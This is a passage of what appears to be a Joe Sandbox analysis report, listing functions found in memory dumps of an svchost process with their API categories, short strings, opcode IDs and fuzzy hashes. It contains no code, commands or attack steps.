                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 96732df7916216e4dd4de8696d19f0f646e57f72df42aa736ed25244752b7042
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: B0111872790F428AEB008B70E8543B833A4F719798F441E35DA6D477A4EB78D2988380
                                                                                Function 000001F28C93253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: a81e46be2f1358104ca60f674bf27db7b8eb3ba3bc6c3102e371a9ccd66cc1d5
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 1B719F36280FC286EB259F36A8483FA67D4F389BC4F582076DD0A53B9ADF35D6458700
                                                                                Function 000001F28C1D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ae7e25292b4b5205da875e4987803c657081cd892f163ddae90b46efd944a166
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 7E613432A01B868AEB20DF69D4803ED7BA0F748BD8F144225EF4917B99DB78E595C740
                                                                                Function 000001F28C932330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 2488fe1737ff95e66ad044885111441f0c3a749c14707708a82aa8e704c637ae
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: B551C072284FC381EB649A3AA4583FAA7D1F3857C0F4D61B5DE5903B9ADB39C6058740
                                                                                Function 000001F28C9426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 2514762f6e10ab6845feae25dddec55dde5b08df4a5e13f98591cf2ab0d60153
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 60418D72615E8186EB209F25E8443FAB7A0F798BD4F548171EE4E87798EB3CC541CB50
                                                                                Function 000001F28C9394A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: a1389ac8532826ac596aaee6b13d59646ba39f355e91e1ec56b6d169f0d5a3fa
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 61112832214FC182EB618F25E4443A9B7E5FB88B94F598264EE8C07B69DF3CC595CB00
                                                                                Function 000001F28C1D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 09633eca710365df152610dc5942b59f08b7406966c11a0154c1b9ae03bc6ca5
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 09E086B1680F4690DF028F62E8802E837E0DB58BA4B489132DA5C47351FB7CD1E9C300
                                                                                Function 000001F28C1D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 6f46bb36e99698124d87c0e4d324587b24abbfd4879edec8008199ce5951e68a
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 74E0E6B1651F45D4DF028F61E4901E877A5E758B94B889132DA5C47355EB78D1E5C300
                                                                                Function 000001F28C931BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 4d82505500ce06d62ce877f2f89efa63fb9e64a04db03c9d2b6106834071bf2b
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 67113A35641F8686EA54DB66A8082B967E1FB89FC0F1890B9DE4D57776EF38C442C300